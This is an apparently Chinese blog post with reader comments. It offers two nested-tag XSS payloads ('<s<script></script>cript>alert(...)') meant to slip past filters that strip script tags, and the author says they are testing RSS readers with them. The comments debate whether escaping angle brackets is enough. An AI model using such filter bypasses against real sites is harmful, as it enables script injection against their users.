这个东西或许可以bypass一些xss过滤

<s<script></script>cript>alert("hackedbykxlzx")<<script></script>/script>

<<script></script>script>alert("hackedbykxlzx")<<script></script>/script>
恩,放这里测几个rss的阅读器。

 

刚好过滤了其他的留下中间的。

发表评论?

9 条评论。

  1. 回楼上?莫非真的以为我会放QQ,GMAIL,SOHU,HOTMAIL。。。的0day在这里?
    我写的是“一些”而已。

  2. planet也飘过,哈哈。

  3. 你自己做站长,估计才有这么弱智的!

  4. 你neeao说的,人家费老大劲去过滤你的script啊,直接把<>转义一下就可以任你使劲卟咚了

  5. 回复楼上,有时候,是不能都转译的。

    比如我在blog发文章,要用到

  6. 根据我的经验
    <>一定要限制,否则后患无穷
    国内很多大网站,都是栽在<>的支持上

发表评论